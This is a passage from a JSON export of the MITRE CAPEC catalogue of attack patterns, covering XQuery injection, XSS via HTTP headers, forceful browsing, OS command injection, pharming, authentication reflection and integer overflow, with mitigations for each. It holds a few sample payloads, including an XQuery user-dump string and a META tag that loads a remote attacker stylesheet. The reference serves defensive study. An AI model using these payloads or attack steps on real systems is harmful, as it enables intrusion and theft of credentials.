Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Design: Perform input allowlist validation on all XML input","Implementation: Run xml parsing and query infrastructure with minimal privileges so that an attacker is limited in their ability to probe other system resources from XQL."]},"Example_Instances":{"Example":{"p":["An attacker can pass XQuery expressions embedded in otherwise standard XML documents. Like SQL injection attacks, the attacker tunnels through the application entry point to target the resource access layer. The string below is an example of an attacker accessing the accounts.xml to request the service provider send all user names back.","The attacks that are possible through XQuery are difficult to predict, if the data is not validated prior to executing the XQL."],"div":["doc(accounts.xml)//user[Name=\'*\']",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"74"},{"CWE_ID":"707"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"46","Entry_Name":"XQuery Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"85":{"ID":"85","Name":"AJAX Footprinting","Abstraction":"Detailed","Status":"Draft","Description":"This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"580"},{"Nature":"CanPrecede","CAPEC_ID":"63"}]},"Execution_Flow":{"Attack_Step":{"Step":"1","Phase":"Explore","Description":"[Send requests to the server and analyze responses] Using a browser or an automated tool, an attacker sends requests to a website and then captures the responses. Responses are analyzed for information on frameworks, architecture, and dependencies.","Technique":["Use a browser to manually request pages and view the responses. Manually parse responses to find information on dependencies and underlying architecture","Use automated scripting to send one or multiple requests to a server and capture any responses. Parse responses from the server to identify any tags that may provide information about dependencies and underlying architecture."]}},"Prerequisites":{"Prerequisite":"The user must allow JavaScript to execute in their browser"},"Skills_Required":{"Skill":["To land and launch a script on victim\'s machine with appropriate footprinting logic for enumerating services and vulnerabilities in JavaScript",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Design: Use browser technologies that do not allow client side scripting.","Implementation: Perform input validation for all remote content."]},"Example_Instances":{"Example":"Footprinting can be executed over almost any protocol including HTTP, TCP, UDP, and ICMP, with the general goal of gaining further information about a host environment to launch further attacks. The attacker can probe the system for banners, vulnerabilities, filenames, available services, and in short anything the host process has access to. The results of the probe are either used to execute javascript (for example, if the attackers\' footprint script identifies a vulnerability in a firewall permission, then the client side script executes a javascript to change client firewall settings, or an attacker may simply echo the results of the scan back out to a remote host for targeting future attacks) or to inform other data gathering activities in order to craft atta."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"79"},{"CWE_ID":"113"},{"CWE_ID":"348"},{"CWE_ID":"96"},{"CWE_ID":"20"},{"CWE_ID":"116"},{"CWE_ID":"184"},{"CWE_ID":"86"},{"CWE_ID":"692"}]},"References":{"Reference":{"External_Reference_ID":"REF-539"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow, Mitigations, Related_Attack_Patterns, Resources_Required, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["AJAX Fingerprinting",{"Date":"2020-12-17"}]}},"86":{"ID":"86","Name":"XSS Through HTTP Headers","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits web applications that generate web content, such as links in a HTML page, based on unvalidated or improperly validated data submitted by other actors. XSS in HTTP Headers attacks target the HTTP headers which are hidden from most users and may not be validated by web applications.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"588"},{"Nature":"ChildOf","CAPEC_ID":"592"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Spider] Using a browser or an automated tool, an attacker follows all public links on a web site. They record all the entry points (input) that becomes part of generated HTTP header (not only GET/POST/COOKIE, but also Content-Type, etc.)","Technique":["Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters used in the HTTP headers.","Look for HTML meta tags that could be injectable","Use a proxy tool to record all links visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":["[Probe identified potential entry points for XSS vulnerability]",{"p":["The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. They record all the responses from the server that include unmodified versions of their script.","The attacker tries also to inject extra-parameter to the HTTP request to see if they are reflected back in the web page or in the HTTP response."]}],"Technique":["Manually inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed.","Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed.","Use a proxy tool to record results of manual input of XSS probes in known URLs."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website.","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"Target software must be a client that allows scripting communication from remote hosts."},"Skills_Required":{"Skill":["To achieve a redirection and use of less trusted source, an attacker can simply edit HTTP Headers that are sent to client machine.",{"Level":"Low"},"Exploiting a client side vulnerability to inject malicious scripts into the browser\'s executable process.",{"Level":"High"}]},"Resources_Required":{"Resource":"The adversary must have the ability to deploy a custom hostile service for access by targeted clients and the abbility to communicate synchronously or asynchronously with client machine. The adversary must also control a remote site of some sort to redirect client and data to."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Use browser technologies that do not allow client side scripting.","Design: Utilize strict type, character, and encoding enforcement","Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client\'s browser has no way of discerning where the data is originating from.","Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Implementation: Perform input validation for all remote content.","Implementation: Perform output validation for all remote content.","Implementation: Disable scripting languages such as JavaScript in browser","Implementation: Session tokens for specific host","Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this."]},"Example_Instances":{"Example":[{"p":["Utilize a remote style sheet set in the HTTP header for XSS attack. When the attacker is able to point to a remote stylesheet, any of the variables set in that stylesheet are controllable on the client side by the remote attacker. Like most XSS attacks, results vary depending on browser that is used.","[REF-97]"],"div":["<META HTTP-EQUIV=\\"Link\\" Content=\\"<http://ha.ckers.org/xss.css>; REL=stylesheet\\">",{"style":"margin-left:10px;","class":"attack"}]},{"p":["Google\'s 404 redirection script was found vulnerable to this attack vector.","Google\'s 404 file not found page read","* Response headers: \\"Content-Type: text/html; charset=[encoding]\\".","* Response body: <META http-equiv=\\"Content-Type\\" (...) charset=[encoding]/>","If the response sends an unexpected encoding type such as UTF-7, then no enforcement is done on the payload and arbitrary XSS code will be transported along with the standard HTTP response. [REF-476]"]},"XSS can be used in variety of ways, because it is scripted and executes in a distributed, asynchronous fashion it can create its own vector and openings. For example, the attacker can use XSS to mount a DDoS attack by having series of different computers unknowingly executing requests against a single host."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"80"}},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-69","Section":"XSS Filter Evasion Cheat Sheet"},{"External_Reference_ID":"REF-476"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Related_Attack_Patterns"}],"Previous_Entry_Name":["Embedding Script (XSS) in HTTP Headers",{"Date":"2017-05-01"}]}},"87":{"ID":"87","Name":"Forceful Browsing","Abstraction":"Standard","Status":"Draft","Description":"An attacker employs forceful browsing (direct URL entry) to access portions of a website that are otherwise unreachable. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"115"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Spider] Using an automated tool, an attacker follows all public links on a web site. They record all the links they find.","Technique":["Use a spidering tool to follow and record all links.","Use a proxy tool to record all links visited during a manual traversal of the web application."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt well-known or guessable resource locations] Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. They record all the positive responses from the server.","Technique":["Use a spidering tool to follow and record attempts on well-known URLs.","Use a proxy tool to record all links visited during a manual traversal of attempts on well-known URLs."]},{"Step":"3","Phase":"Exploit","Description":"[Use unauthorized resources] By visiting the unprotected resource, the attacker makes use of unauthorized functionality.","Technique":"Access unprotected functions and execute them."},{"Step":"4","Phase":"Exploit","Description":"[View unauthorized data] The attacker discovers and views unprotected sensitive data.","Technique":"Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.)"}]},"Prerequisites":{"Prerequisite":"The forcibly browseable pages or accessible resources must be discoverable and improperly protected."},"Skills_Required":{"Skill":["Forcibly browseable pages can be discovered by using a number of automated tools. Doing the same manually is tedious but by no means difficult.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. A directory listing is helpful, but not a requirement."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Authenticate request to every resource. In addition, every page or resource must ensure that the request it is handling has been made in an authorized context.","Forceful browsing can also be made difficult to a large extent by not hard-coding names of application pages or resources. This way, the attacker cannot figure out, from the application alone, the resources available from the present context."]},"Example_Instances":{"Example":{"p":["A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.","An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate themself in that role."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"425"},{"CWE_ID":"285"},{"CWE_ID":"693"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"34","Entry_Name":"Predictable Resource Location"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Forced browsing"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Taxonomy_Mappings"}]}},"88":{"ID":"88","Name":"OS Command Injection","Abstraction":"Standard","Status":"Draft","Description":"In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"248"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify inputs for OS commands] The attacker determines user controllable input that gets passed as part of a command to the underlying operating system.","Technique":["Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.","TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.","Induce errors to find informative error messages"]},{"Step":"2","Phase":"Explore","Description":"[Survey the Application] The attacker surveys the target application, possibly as a valid and authenticated user","Technique":["Spidering web sites for all available links","Inventory all application inputs"]},{"Step":"3","Phase":"Experiment","Description":"[Vary inputs, looking for malicious results.] Depending on whether the application being exploited is a remote or local one the attacker crafts the appropriate malicious input, containing OS commands, to be passed to the application","Technique":["Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)","Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)"]},{"Step":"4","Phase":"Exploit","Description":"[Execute malicious commands] The attacker may steal information, install a back door access mechanism, elevate privileges or compromise the system in some other way.","Technique":"The attacker executes a command that stores sensitive information into a location where they can retrieve it later (perhaps using a different command injection)."}]},"Prerequisites":{"Prerequisite":"User controllable input used as part of commands to the underlying operating system."},"Skills_Required":{"Skill":["The attacker needs to have knowledge of not only the application to exploit but also the exact nature of commands that pertain to the target operating system. This may involve, though not always, knowledge of specific assembly commands for the platform.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Gain Privileges","Bypass Protection Mechanism"]},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Use language APIs rather than relying on passing data to the operating system shell or command line. Doing so ensures that the available protection mechanisms in the language are intact and applicable.","Filter all incoming data to escape or remove characters or strings that can be potentially misinterpreted as operating system or shell commands","All application processes should be run with the minimal privileges required. Also, processes must shed privileges as soon as they no longer require them."]},"Example_Instances":{"Example":{"p":["A transaction processing system relies on code written in a number of languages. To access this functionality, the system passes transaction information on the system command line.","An attacker can gain access to the system command line and execute malicious commands by injecting these commands in the transaction data. If successful, the attacker can steal information, install backdoors and perform other nefarious activities that can compromise the system and its data."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"78"},{"CWE_ID":"88"},{"CWE_ID":"20"},{"CWE_ID":"697"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"31","Entry_Name":"OS Commanding"}},"References":{"Reference":{"External_Reference_ID":"REF-543"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Execution_Flow, Related_Weaknesses"}]}},"89":{"ID":"89","Name":"Pharming","Abstraction":"Standard","Status":"Draft","Description":"A pharming attack occurs when the victim is fooled into entering sensitive data into supposedly trusted locations, such as an online bank site or a trading platform. An attacker can impersonate these supposedly trusted sites and have the victim be directed to their site rather than the originally intended one. Pharming does not require script injection or clicking on malicious links for the attack to succeed.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"151","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Exploit","Description":"Attacker sets up a system mocking the one trusted by the users. This is usually a website that requires or handles sensitive information."},{"Step":"2","Phase":"Exploit","Description":"The attacker then poisons the resolver for the targeted site. This is achieved by poisoning the DNS server, or the local hosts file, that directs the user to the original website"},{"Step":"3","Phase":"Exploit","Description":"When the victim requests the URL for the site, the poisoned records direct the victim to the attackers\' system rather than the original one."},{"Step":"4","Phase":"Exploit","Description":"Because of the identical nature of the original site and the attacker controlled one, and the fact that the URL is still the original one, the victim trusts the website reached and the attacker can now \\"farm\\" sensitive information such as credentials or account numbers."}]},"Prerequisites":{"Prerequisite":["Vulnerable DNS software or improperly protected hosts file or router that can be poisoned","A website that handles sensitive information but does not use a secure connection and a certificate that is valid is also prone to pharming"]},"Skills_Required":{"Skill":["The attacker needs to be able to poison the resolver - DNS entries or local hosts file or router entry pointing to a trusted DNS server - in order to successfully carry out a pharming attack. Setting up a fake website, identical to the targeted one, does not require special skills.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. Having knowledge of the way the target site has been structured, in order to create a fake version, is required. Poisoning the resolver requires knowledge of a vulnerability that can be exploited."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["All sensitive information must be handled over a secure connection.","Known vulnerabilities in DNS or router software or in operating systems must be patched as soon as a fix has been released and tested.","End users must ensure that they provide sensitive information only to websites that they trust, over a secure connection with a valid certificate issued by a well-known certificate authority."]},"Example_Instances":{"Example":{"p":["An online bank website requires users to provide their customer ID and password to log on, but does not use a secure connection.","An attacker can setup a similar fake site and leverage pharming to collect this information from unknowing victims."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"346"},{"CWE_ID":"350"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"90":{"ID":"90","Name":"Reflection Attack in Authentication Protocol","Abstraction":"Standard","Status":"Draft","Description":"An adversary can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the adversary illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An adversary can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"272","Exclude_Related":{"Exclude_ID":"513"}},{"Nature":"ChildOf","CAPEC_ID":"114","Exclude_Related":{"Exclude_ID":"515"}}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify service with vulnerable handshake authentication] The adversary must first identify a vulnerable authentication protocol. The most common indication of an authentication protocol vulnerable to reflection attack is when the client initiates the handshake, rather than the server. This allows the client to get the server to encrypt targeted data using the server\'s pre-shared key."},{"Step":"2","Phase":"Experiment","Description":"[Send challenge to target server] The adversary opens a connection to the target server and sends it a challenge. This challenge is arbitrary and is simply used as a placeholder for the protocol in order to get the server to respond."},{"Step":"3","Phase":"Experiment","Description":"[Receive server challenge] The server responds by returning the challenge sent encrypted with the server\'s pre-shared key, as well as its own challenge to the attacker sent in plaintext. We will call this challenge sent by the server \\"C\\". C is very important and is stored off by the adversary for the next step."},{"Step":"4","Phase":"Experiment","Description":"[Initiate second handshake] Since the adversary does not possess the pre-shared key, they cannot encrypt C from the previous step in order for the server to authenticate them. To get around this, the adversary initiates a second connection to the server while still keeping the first connection alive. In the second connection, the adversary sends C as the initial client challenge, which rather than being arbitary like the first connection, is very intentional."},{"Step":"5","Phase":"Experiment","Description":"[Receive encrypted challenge] The server treats the intial client challenge in connection two as an arbitrary client challenge and responds by encrypting C with the pre-shared key. The server also sends a new challenge. The adversary ignores the server challenge and stores the encrypted version of C. The second connection is either terminated or left to expire by the adversary as it is no longer needed."},{"Step":"6","Phase":"Exploit","Description":"The adversary now posseses the encrypted version of C that is obtained through connection two. The adversary continues the handshake in connection one by responding to the server with the encrypted version of C, verifying that they have access to the pre-shared key (when they actually do not). Because the server uses the same pre-shared key for all authentication it will decrypt C and authenticate the adversary for the first connection, giving the adversary illegitimate access to the target system."}]},"Prerequisites":{"Prerequisite":"The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers\' ability to attack the authentication protocol."},"Skills_Required":{"Skill":["The attacker needs to have knowledge of observing the protocol exchange and managing the required connections in order to issue and respond to challenges",{"Level":"Medium"}]},"Resources_Required":{"Resource":"All that the attacker requires is a means to observe and understand the protocol exchanges in order to reflect the challenges appropriately."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Gain Privileges","Bypass Protection Mechanism"]},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["The server must initiate the handshake by issuing the challenge. This ensures that the client has to respond before the exchange can move any further","The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client\'s challenge, its own challenge and the pre-shared secret. Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid pre-shared secret can successfully hash in the two values.","Introducing a random nonce with each new connection ensures that the attacker cannot employ two connections to attack the authentication protocol"]},"Example_Instances":{"Example":{"p":["A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.","An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"301"},{"CWE_ID":"303"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"92":{"ID":"92","Name":"Forced Integer Overflow","Abstraction":"Detailed","Status":"Draft","Description":"This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"128"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The first step is exploratory meaning the attacker looks for an integer variable that they can control."},{"Step":"2","Phase":"Experiment","Description":"The attacker finds an integer variable that they can write into or manipulate and try to get the value of the integer out of the possible range."},{"Step":"3","Phase":"Exploit","Description":"The integer variable is forced to have a value out of range which set its final value to an unexpected value."},{"Step":"4","Phase":"Exploit","Description":"The target host acts on the data and unexpected behavior may happen."}]},"Prerequisites":{"Prerequisite":["The attacker can manipulate the value of an integer variable utilized by the target host.","The target host does not do proper range checking on the variable before utilizing it.","When the integer variable is incremented or decremented to an out of range value, it gets a very different value (e.g. very small or negative number)"]},"Skills_Required":{"Skill":["An attacker can simply overflow an integer by inserting an out of range value.",{"Level":"Low"},"Exploiting a buffer overflow by injecting malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["Use a language or compiler that performs automatic bounds checking.","Carefully review the service\'s implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as integer overflow.","Use an abstraction library to abstract away risky APIs. Not a complete solution.","Always do bound checking before consuming user input data."]},"Example_Instances":{"Example":["Integer overflow in the ProcAuWriteElement function in server/dia/audispatch.c in Network Audio System (NAS) before 1.8a SVN 237 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large max_samples value. See also: CVE-2007-1544",{"p":["The following code illustrates an integer overflow. The declaration of total integer as \\"unsigned short int\\" assumes that the length of the first and second arguments fits in such an integer.","[REF-547], [REF-548]"],"div":["include 